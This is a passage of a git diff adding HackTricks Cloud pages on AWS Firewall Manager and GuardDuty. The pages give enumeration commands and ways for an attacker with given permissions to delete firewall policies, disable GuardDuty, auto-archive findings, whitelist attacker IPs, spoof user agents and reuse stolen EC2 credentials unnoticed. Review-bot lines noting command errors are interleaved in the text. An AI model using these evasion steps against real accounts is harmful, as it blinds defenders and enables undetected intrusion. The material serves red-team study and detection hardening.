Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required. + +It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option. + +### Prerequisites + +The following prerequisite steps must be completed before proceeding to configure Firewall Manager to begin protecting your organization's resources effectively. These steps provide the foundational setup required for Firewall Manager to enforce security policies and ensure compliance across your AWS environment: + +1. **Join and configure AWS Organizations:** Ensure your AWS account is part of the AWS Organizations organization where the AWS Firewall Manager policies are planned to be implanted. This allows for centralized management of resources and policies across multiple AWS accounts within the organization. +2. **Create an AWS Firewall Manager Default Administrator Account:** Establish a default administrator account specifically for managing Firewall Manager security policies. This account will be responsible for configuring and enforcing security policies across the organization. Just the management account of the organization is able to create Firewall Manager default administrator accounts. +3. **Enable AWS Config:** Activate AWS Config to provide Firewall Manager with the necessary configuration data and insights required to effectively enforce security policies. AWS Config helps analyze, audit, monitor and audit resource configurations and changes, facilitating better security management. +4. **For Third-Party Policies, Subscribe in the AWS Marketplace and Configure Third-Party Settings:** If you plan to utilize third-party firewall policies, subscribe to them in the AWS Marketplace and configure the necessary settings. 
This step ensures that Firewall Manager can integrate and enforce policies from trusted third-party vendors. +5. **For Network Firewall and DNS Firewall Policies, enable resource sharing:** Enable resource sharing specifically for Network Firewall and DNS Firewall policies. This allows Firewall Manager to apply firewall protections to your organization's VPCs and DNS resolution, enhancing network security. +6. **To use AWS Firewall Manager in Regions that are disabled by default:** If you intend to use Firewall Manager in AWS regions that are disabled by default, ensure that you take the necessary steps to enable its functionality in those regions. This ensures consistent security enforcement across all regions where your organization operates. + +For more information, check: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html). + +### Types of protection policies + +AWS Firewall Manager manages several types of policies to enforce security controls across different aspects of your organization's infrastructure: + +1. **AWS WAF Policy:** This policy type supports both AWS WAF and AWS WAF Classic. You can define which resources are protected by the policy. For AWS WAF policies, you can specify sets of rule groups to run first and last in the web ACL. Additionally, account owners can add rules and rule groups to run in between these sets. +2. **Shield Advanced Policy:** This policy applies Shield Advanced protections across your organization for specified resource types. It helps safeguard against DDoS attacks and other threats. +3. **Amazon VPC Security Group Policy:** With this policy, you can manage security groups used throughout your organization, enforcing a baseline set of rules across your AWS environment to control network access. +4. 
**Amazon VPC Network Access Control List (ACL) Policy:** This policy type gives you control over network ACLs used in your organization, allowing you to enforce a baseline set of network ACLs across your AWS environment. +5. **Network Firewall Policy:** This policy applies AWS Network Firewall protection to your organization's VPCs, enhancing network security by filtering traffic based on predefined rules. +6. **Amazon Route 53 Resolver DNS Firewall Policy:** This policy applies DNS Firewall protections to your organization's VPCs, helping to block malicious domain resolution attempts and enforce security policies for DNS traffic. +7. **Third-Party Firewall Policy:** This policy type applies protections from third-party firewalls, which are available by subscription through the AWS Marketplace console. It allows you to integrate additional security measures from trusted vendors into your AWS environment. + 1. **Palo Alto Networks Cloud NGFW Policy:** This policy applies Palo Alto Networks Cloud Next Generation Firewall (NGFW) protections and rulestacks to your organization's VPCs, providing advanced threat prevention and application-level security controls. + 2. **Fortigate Cloud Native Firewall (CNF) as a Service Policy:** This policy applies Fortigate Cloud Native Firewall (CNF) as a Service protections, offering industry-leading threat prevention, web application firewall (WAF), and API protection tailored for cloud infrastructures. + +### Administrator accounts + +AWS Firewall Manager offers flexibility in managing firewall resources within your organization through its administrative scope and two types of administrator accounts. + +**Administrative scope defines the resources that a Firewall Manager administrator can manage**. After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. 
These scopes can include: + +* Accounts or organizational units (OUs) that the administrator can apply policies to. +* Regions where the administrator can perform actions. +* Firewall Manager policy types that the administrator can manage. + +Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege. + +There are two distinct types of administrator accounts, each serving specific roles and responsibilities: + +* **Default Administrator:** + * The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager. + * This account has the capability to manage third-party firewalls and possesses full administrative scope. + * It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization. + * While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization. +* **Firewall Manager Administrators:** + * These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration. + * Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards. 
+ * Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager. + +Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources. + +It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed: + +* First, each Firewall Administrator administrator account must revoke their own account. +* Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account. +* To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator. 
+ +## Enumeration + +``` +# Users/Administrators + +## Get the AWS Organizations account that is associated with AWS Firewall Manager as the AWS Firewall Manager default administrator +aws fms get-admin-account + +## List of Firewall Manager administrators within the organization +aws fms list-admin-accounts-for-organization # ReadOnlyAccess policy is not enough for this + +## Return a list of the member accounts in the FM administrator's AWS organization +aws fms list-member-accounts # Only a Firewall Manager administrator or the Organization's management account can make this request + +## List the accounts that are managing the specified AWS Organizations member account +aws fms list-admins-managing-account # ReadOnlyAccess policy is not enough for this + +# Resources + +## Get the resources that a Firewall Manager administrator can manage +aws fms get-admin-scope --admin-account # ReadOnlyAccess policy is not enough for this + +## Returns the summary of the resource sets used +aws fms list-resource-sets # ReadOnlyAccess policy is not enough for this + +## Get information about a specific resource set +aws fms get-resource-set --identifier # ReadOnlyAccess policy is not enough for this + +## Retrieve the list of tags for a given resource +aws fms list-tags-for-resource --resource-arn + +## List of the resources in the AWS Organization's accounts that are available to be associated with a FM resource set. Only one account is supported per request. 
+aws fms list-compliance-status --member-account-ids --resource-type # ReadOnlyAccess policy is not enough for this + +## List the resources that are currently associated to a resource set +aws fms list-resource-set-resources --identifier # ReadOnlyAccess policy is not enough for this + +# Policies + +## Returns the list of policies +aws fms list-policies + +## Get information about the specified AWS Firewall Manager policy +aws fms get-policy --policy-id + +## List all of the third-party firewall policies that are associated with the third-party firewall administrator's account +aws fms list-third-party-firewall-firewall-policies --third-party-firewall # ReadOnlyAccess policy is not enough for this + +# AppsList + +## Return a list of apps list +aws fms list-apps-lists --max-results [1-100] + +## Get information about the specified AWS Firewall Manager applications list +aws fms get-apps-list --list-id + +# Protocols + +## Get the details of the Firewall Manager protocols list. +aws fms list-protocols-lists + +## Get information about the specified AWS Firewall Manager Protocols list +aws fms get-protocols-list --list-id + +# Compliance + +## Return a summary of which member accounts are protected by the specified policy +aws fms list-compliance-status --policy-id + +## Get detailed compliance information about the specified member account (resources that are in and out of compliance with the specified policy) +aws fms get-compliance-detail --policy-id --member-account + +# Other useful info + +## Get information about the SNS topic that is used to record AWS Firewall Manager SNS logs (if any) +aws fms get-notification-channel + +## Get policy-level attack summary information in the event of a potential DDoS attack +aws fms get-protection-status --policy-id # Just for Shield Advanced policy + +## Get the onboarding status of a Firewall Manager admin account to third-party firewall vendor tenant. 
+aws fms get-third-party-firewall-association-status --third-party-firewall # ReadOnlyAccess policy is not enough for this + +## Get violations' details for a resource based on the specified AWS Firewall Manager policy and AWS account. +aws fms get-violation-details --policy-id --member-account --resource-id --resource-type +``` + +## Post Exploitation / Bypass Detection + +### `organizations:DescribeOrganization` & (`fms:AssociateAdminAccount`, `fms:DisassociateAdminAccount`, `fms:PutAdminAccount`) + +An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or updatea Firewall Manager administrator account and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association. + +* The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account. +* In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**. +* The creation of a Firewall Manager administrator account can only be done by the organization's management account. + +```bash +aws fms associate-admin-account --admin-account +aws fms disassociate-admin-account +aws fms put-admin-account --admin-account +``` + +**Potential Impact:** Loss of centralized management, policy evasion, compliance violations, and disruption of security controls within the environment. 
+ +### `fms:PutPolicy`, `fms:DeletePolicy` + +An attacker with the **`fms:PutPolicy`**, **`fms:DeletePolicy`** permissions would be able to create, modify or permanently delete an AWS Firewall Manager policy. + +```bash +aws fms put-policy --policy | --cli-input-json file:// [--tag-list ] +aws fms delete-policy --policy-id [--delete-all-policy-resources | --no-delete-all-policy-resources] +``` + +An example of permisive policy through permisive security group, in order to bypass the detection, could be the following one: + +```json +{ + "Policy": { + "PolicyName": "permisive_policy", + "SecurityServicePolicyData": { + "Type": "SECURITY_GROUPS_COMMON", + "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" + }, + "ResourceTypeList": ["AWS::EC2::Instance", "AWS::EC2::NetworkInterface", "AWS::EC2::SecurityGroup", "AWS::ElasticLoadBalancingV2::LoadBalancer", "AWS::ElasticLoadBalancing::LoadBalancer"], + "ResourceType": "AWS::EC2::SecurityGroup", + "ExcludeResourceTags": false, + "ResourceTags": [], + "RemediationEnabled": true + }, + "TagList": [] +} +``` + +**Potential Impact:** Dismantling of security controls, policy evasion, compliance violations, operational disruptions, and potential data breaches within the environment. + +### `fms:BatchAssociateResource`, `fms:BatchDisassociateResource`, `fms:PutResourceSet`, `fms:DeleteResourceSet` + +An attacker with the **`fms:BatchAssociateResource`** and **`fms:BatchDisassociateResource`** permissions would be able to associate or disassociate resources from a Firewall Manager resource set respectively. In addition, the **`fms:PutResourceSet`** and **`fms:DeleteResourceSet`** permissions would allow an attacker to create, modify or delete these resource sets from AWS Firewall Manager. 
+ +```bash +# Associate/Disassociate resources from a resource set +aws fms batch-associate-resource --resource-set-identifier --items +aws fms batch-disassociate-resource --resource-set-identifier --items + +# Create, modify or delete a resource set +aws fms put-resource-set --resource-set [--tag-list ] +aws fms delete-resource-set --identifier +``` + +**Potential Impact:** The addition of an unnecessary amount of items to a resource set will increase the level of noise in the Service potentially causing a DoS. In addition, changes of the resource sets could lead to a resource disruption, policy evasion, compliance violations, and disruption of security controls within the environment. + +### `fms:PutAppsList`, `fms:DeleteAppsList` + +An attacker with the **`fms:PutAppsList`** and **`fms:DeleteAppsList`** permissions would be able to create, modify or delete application lists from AWS Firewall Manager. This could be critical, as unauthorized applications could be allowed access to the general public, or access to authorized applications could be denied, causing a DoS. + +```bash +aws fms put-apps-list --apps-list [--tag-list ] +aws fms delete-apps-list --list-id +``` + +**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment. + +### `fms:PutProtocolsList`, `fms:DeleteProtocolsList` + +An attacker with the **`fms:PutProtocolsList`** and **`fms:DeleteProtocolsList`** permissions would be able to create, modify or delete protocols lists from AWS Firewall Manager. Similarly as with applications lists, this could be critical since unauthorized protocols could be used by the general public, or the use of authorized protocols could be denied, causing a DoS. 
+ +```bash +aws fms put-protocols-list --apps-list [--tag-list ] +aws fms delete-protocols-list --list-id +``` + +**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment. + +### `fms:PutNotificationChannel`, `fms:DeleteNotificationChannel` + +An attacker with the **`fms:PutNotificationChannel`** and **`fms:DeleteNotificationChannel`** permissions would be able to delete and designate the IAM role and Amazon Simple Notification Service (SNS) topic that Firewall Manager uses to record SNS logs. + +To use **`fms:PutNotificationChannel`** outside of the console, you need to set up the SNS topic's access policy, allowing the specified **SnsRoleName** to publish SNS logs. If the provided **SnsRoleName** is a role other than the **`AWSServiceRoleForFMS`**, it requires a trust relationship configured to permit the Firewall Manager service principal **fms.amazonaws.com** to assume this role. + +For information about configuring an SNS access policy: + +{% content-ref url="../aws-services/aws-sns-enum.md" %} +[aws-sns-enum.md](../aws-services/aws-sns-enum.md) +{% endcontent-ref %} + +```bash +aws fms put-notification-channel --sns-topic-arn --sns-role-name +aws fms delete-notification-channel +``` + +**Potential Impact:** This would potentially lead to miss security alerts, delayed incident response, potential data breaches and operational disruptions within the environment. + +### `fms:AssociateThirdPartyFirewall`, `fms:DisssociateThirdPartyFirewall` + +An attacker with the **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager. + +{% hint style="warning" %} +Only the default administrator can create and manage third-party firewalls. 
+{% endhint %} + +```bash +aws fms associate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL] +aws fms disassociate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL] +``` + +**Potential Impact:** The disassociation would lead to a policy evasion, compliance violations, and disruption of security controls within the environment. The association on the other hand would lead to a disruption of cost and budget allocation. + +### `fms:TagResource`, `fms:UntagResource` + +An attacker would be able to add, modify, or remove tags from Firewall Manager resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. + +```bash +aws fms tag-resource --resource-arn --tag-list +aws fms untag-resource --resource-arn --tag-keys +``` + +**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. + +## References + +* [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html) +* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html) +* [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
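Review bot: in the Enumeration block, the command placed under "List of the resources in the AWS Organization's accounts that are available to be associated with a FM resource set" is `aws fms list-compliance-status --member-account-ids --resource-type`, but `list-compliance-status` takes `--policy-id` (the same block shows that correctly further down under `# Compliance`); the comment describes the ListDiscoveredResources operation, so the line should read `aws fms list-discovered-resources --member-account-ids --resource-type`. Same block: the opening fence has no language tag while every other block in this file is ```bash. Under `fms:PutProtocolsList`, `aws fms put-protocols-list --apps-list` reuses the apps-list flag; the protocols list parameter is `--protocols-list`. The third-party firewall heading and body spell the permission `fms:DisssociateThirdPartyFirewall` (three s); the action is `fms:DisassociateThirdPartyFirewall`, matching the `disassociate-third-party-firewall` command shown right below it. Minor wording: "create or updatea" -> "create or update a"; "permisive" -> "permissive" (twice in the sentence and once in the `PolicyName` value); "miss security alerts" -> "missed security alerts". In the example policy JSON, `"id":""` is an empty value that is easy to mistake for a valid input; an obvious placeholder such as `<SECURITY_GROUP_ID>` would make clear it has to be filled in.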
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md new file mode 100644 index 0000000000..3f2e037467 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md @@ -0,0 +1,232 @@ +# AWS - GuardDuty Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## GuardDuty + +According to the [**docs**](https://aws.amazon.com/guardduty/features/): GuardDuty combines **machine learning, anomaly detection, network monitoring, and malicious file discovery**, using both AWS and industry-leading third-party sources to help protect workloads and data on AWS. GuardDuty is capable of analysing tens of billions of events across multiple AWS data sources, such as AWS CloudTrail event logs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) audit and system-level logs, and DNS query logs. + +Amazon GuardDuty **identifies unusual activity within your accounts**, analyses the **security relevanc**e of the activity, and gives the **context** in which it was invoked. This allows a responder to determine if they should spend time on further investigation. + +Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events. + +{% hint style="warning" %} +When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\ +If you just stop it, the existing findings will remain. +{% endhint %} + +### Findings Example + +* **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP. +* **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS. 
+* **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses. +* **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets. + +
+ +Finding Information + +Finding summary: + +* Finding type +* Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low +* Region +* Account ID +* Resource ID +* Time of detection +* Which threat list was used + +The body has this information: + +* Resource affected +* Action +* Actor: Ip address, port and domain +* Additional Information + +
+ +### All Findings + +Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) + +### Multi Accounts + +#### By Invitation + +You can **invite other accounts** to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation. + +#### Via Organization + +You can designate any account within the organization to be the **GuardDuty delegated administrator**. Only the organization management account can designate a delegated administrator. + +An account that gets designated as a delegated administrator becomes a GuardDuty administrator account, has GuardDuty enabled automatically in the designated AWS Region, and also has the **permission to enable and manage GuardDuty for all of the accounts in the organization within that Region**. The other accounts in the organization can be viewed and added as GuardDuty member accounts associated with this delegated administrator account. 
+ +## Enumeration + +{% code overflow="wrap" %} +```bash +# Get Org config +aws guardduty list-organization-admin-accounts #Get Delegated Administrator +aws guardduty describe-organization-configuration --detector-id + +# Check external invitations +aws guardduty list-invitations +aws guardduty get-invitations-count + +# Detector Information +aws guardduty list-detectors # 1 detector per account with GuardDuty +aws guardduty get-detector --detector-id # Get detector info +aws guardduty get-master-account --detector-id + +# Get filters +aws guardduty list-filters --detector-id # Check filters +aws guardduty get-filter --detector-id --filter-name + +# Findings +aws guardduty list-findings --detector-id # List findings +aws guardduty get-findings --detector-id --finding-ids # Get details about the finding +aws guardduty get-findings-statistics --detector-id --finding-statistic-types + +# Get trusted IP addresses +aws guardduty list-ip-sets --detector-id +aws guardduty get-ip-set --detector-id + +# Member accounts of the current AWS GuardDuty master account +aws guardduty list-members --detector-id +aws guardduty get-members --detector-id --account-ids +aws guardduty get-member-detectors --detector-id --account-ids + +# Continuously export its findings to an Amazon S3 bucket +aws guardduty list-publishing-destinations --detector-id + +# Intelligence sets that you have uploaded to GuardDuty +aws guardduty list-threat-intel-sets --detector-id +aws guardduty get-threat-intel-set --detector-id --threat-intel-set-id +``` +{% endcode %} + +## GuardDuty Bypass + +### General Guidance + +Try to find out as much as possible about the behaviour of the credentials you are going to use: + +* Times it's used +* Locations +* User Agents / Services (It could be used from awscli, webconsole, lambda...) 
+* Permissions regularly used + +With this information, recreate as much as possible the same scenario to use the access: + +* If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible) +* If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges +* Always try to use the **same permissions** this principal has used +* If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one) + +### Breaking GuardDuty + +#### `guardduty:UpdateDetector` + +With this permission you could disable GuardDuty to avoid triggering alerts. + +{% code overflow="wrap" %} +```bash +aws guardduty update-detector --detector-id --no-enable +aws guardduty update-detector --detector-id --data-sources S3Logs={Enable=false} +``` +{% endcode %} + +#### `guardduty:CreateFilter` + +Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings: + +{% code overflow="wrap" %} +```bash +aws guardduty create-filter --detector-id --name --finding-criteria file:///tmp/criteria.json --action ARCHIVE +``` +{% endcode %} + +#### `iam:PutRolePolicy`, (`guardduty:CreateIPSet`|`guardduty:UpdateIPSet`) + +Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address to it and avoid generating alerts. 
+ +{% code overflow="wrap" %} +```bash +aws guardduty update-ip-set --detector-id --activate --ip-set-id --location https://some-bucket.s3-eu-west-1.amazonaws.com/attacker.csv +``` +{% endcode %} + +#### `guardduty:DeletePublishingDestination` + +Attackers could remove the destination to prevent alerting: + +{% code overflow="wrap" %} +```bash +aws guardduty delete-publishing-destination --detector-id --destination-id +``` +{% endcode %} + +{% hint style="danger" %} +Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings. +{% endhint %} + +### Specific Findings Bypass Examples + +Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught. + +Here you have a couple of examples of specific GuardDuty findings bypasses: + +#### [PenTest:IAMUser/KaliLinux](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux) + +GuardDuty detect AWS API requests from common penetration testing tools and trigger a [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\ +It's detected by the **user agent name** that is passed in the API request.\ +Therefore, **modifying the user agent** it's possible to prevent GuardDuty from detecting the attack. 
+ +To prevent this you can search from the script `session.py` in the `botocore` package and modify the user agent, or set Burp Suite as the AWS CLI proxy and change the user-agent with the MitM or just use an OS like Ubuntu, Mac or Windows will prevent this alert from triggering. + +#### UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration + +Extracting EC2 credentials from the metadata service and **utilizing them outside** the AWS environment activates the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) alert. Conversely, employing these credentials from your EC2 instance triggers the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) alert. Yet, **using the credentials on another compromised EC2 instance within the same account goes undetected**, raising no alert. + +{% hint style="success" %} +Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert. 
+{% endhint %} + +## References + +* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) +* [https://docs.aws.amazon.com/guardduty/latest/ug/findings\_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html) +* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_upload-lists.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) +* [https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html](https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html) +* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-ec2.html#unauthorizedaccess-ec2-torclient](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient) +* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) +* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) +* [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
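Review bot: under `# Get trusted IP addresses` in the Enumeration block, `aws guardduty get-ip-set --detector-id` is missing the required `--ip-set-id` parameter; the `update-ip-set` command later in this file passes `--ip-set-id`, and the sibling `get-threat-intel-set` line passes `--threat-intel-set-id`, so this should be `aws guardduty get-ip-set --detector-id --ip-set-id`. In the Finding Information list, `01-3.9 Low` has a dropped decimal point (the other two bands are written `7-8.9` and `4-6.9`). The References list includes the `unauthorizedaccess-ec2-torclient` and `what-are-vpc-endpoints` links, but nothing in the body cites either; either mention them in the text or drop them. Grammar: "When a user disable GuardDuty" -> "disables"; "GuardDuty detect AWS API requests ... and trigger" -> "detects ... triggers"; "Therefore, modifying the user agent it's possible" -> "it is possible"; "as Red Teamer" -> "as a Red Teamer"; "awscli sometime call several read APIs" -> "sometimes calls".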
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md new file mode 100644 index 0000000000..c2e414d657 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md @@ -0,0 +1,421 @@ +# AWS - Inspector Enum + +## AWS - Inspector Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
